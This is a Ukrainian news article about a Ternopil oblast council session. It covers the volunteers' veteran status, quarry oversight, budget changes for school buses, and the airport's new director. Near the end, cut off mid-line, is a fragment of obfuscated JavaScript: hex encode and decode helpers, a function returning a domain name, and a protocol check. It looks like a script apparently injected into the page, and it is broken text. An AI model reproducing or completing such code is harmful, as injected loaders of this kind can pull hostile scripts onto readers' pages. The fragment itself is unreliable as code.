Ви знаходитесь: Головна / Новини / Обласна рада зробила крок до визнання добровольців учасниками бойових дій

Обласна рада зробила крок до визнання добровольців учасниками бойових дій

Обласна рада зробила крок до визнання добровольців учасниками бойових дій. На черговій сесії депутати підтримали звернення громадських активістів, які закликали надати добровольчим батальйонам відповідний статус ветеранів війни.

Третю сесію обласної ради розпочали не із численних депутатських запитів, а з прийняття важливого для бійців рішення. Абсолютна більшість підтримала звернення громадських активістів, які закликали надати добровольцям статус ветеранів війни.

ДМИТРО ГАЙДУЦЬКИЙ, координатор Національного руху «Дія» в Тернопільській області

«Українські добровольці, які взяли зброю до рук першими і стали на захист державних кордонів України від окупанта, зараз, фактично, знаходяться поза законом. Ударна міць українських воєнних дій, легендарні «кіборги» та учасники інших найгарячіших військових баталій з окупантом в Україні, після трьох років ведення бойових дій досі не визнані учасниками АТО».

МАРІЯ ПОДИБАЙЛО, представник ГО «Новий Маріуполь»

«Питання не в пільгах. На мій погляд, це просто наш з вами моральний обов’язок, шоб в той час, коли держава впорядковує, вшановує своїх Героїв, впорядковує всі соціальні питання. Ці, хто були найбільшими Героями заслуговують, власне, на нашу з вами повагу, на нашу маленьку з вами часточку того, що їм належить».

Своїм рішенням облрада доручила облдержадміністрації розробити та подати на чергове пленарне засідання сесії проект відповідного рішення.

СТЕПАН БАРНА, голова Тернопільської ОДА

«Ми сьогодні прийняли програму підтримки учасників АТО на сесії обласної ради, де передбачили щонайменше півтори мільйони гривень на цю програму. Ви маєте можливість контролювати ефективність використання цих коштів спільно з радою учасників АТО, кожен має доступ. І ми повність підтримуємо вашу позицію в тому, що в Тернопільській області прирівняти в такому статусі наших бойових побратимів».

Не оминули депутати і проблему кар’єрів у нашій області. Зокрема проголосували за створення контрольної комісії з вивчення законності надрокористування в області. Головою комісії обрали депутата – Петра Васька. Він каже, актуальні проблеми зараз із кар’єром в Новосілці, де вже тиждень страйкують працівники.

ПЕТРО ВАСЬКО, депутат обласної ради

«Недавно наша комісія давала дозвіл на іменно на Новосілку. Ми абсолютно не розбиралися питанням. Прийшли, сказали: добре, все, дали. На сьогоднішній день виникло питання, що люди абсолютно незахищені на тих кар’єрах. Екологія, я об’їздив ці кар’єри, екологія на нулю».

За цією інформацію, Степан Барна пообіцяв дати доручення відповідним службам провести перевірку кар’єру на предмет законності. А також заявив про свою принципову позицію легалізації кар’єрів. Однак наголосив, під цим «прапором» боротьби із незаконними кар’єрами не повинні, цитата: «тероризувати нормальний бізнес».

СТЕПАН БАРНА, голова Тернопільської ОДА

«Мені приємно, на приклад, констатувати, що сьогодні тернопільський спецкар’єр в Максимівцях Збаразького району, сплатив у місцевий бюджет 5 млн. грн. податків за надра і 1 млн. грн. оренди за землю. Ви собі уявляєте сільську раду на території Тернопільської області, яка отримує 6 млн. грн. доходів?»

Внесли на сесії також зміни до обласного бюджету на 2016 рік. Зокрема, залишок субвенцій вирішили спрямувати на придбання шкільних автобусів для перевезення дітей, що проживають у сільській місцевості.

СТЕПАН  СКИБИЛЯК, директор департаменту фінансів Тернопільської ОДА

«Сьогодні вартість автобусів зросла і за ці кошти, які передбачені районом, не можливо зараз придбати автобус, прийнято рішення підняти ці кошти на рівень обласного бюджету і закупити ці автобуси централізовано і віддати тим районам і громадам, в яких автобуси були забрані в АТО».

Не обійшли і питання Тернопільського аеропорту. Зокрема, проголосували за призначення його директором – Юрія Малецького. Також після дискусій та обговорень дали дозвіл підприємству «Фірма Тернопільавіаавтотранс» на вилучення з користування частини земельної ділянки. А саме, близько двох з половиною гектарів землі.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top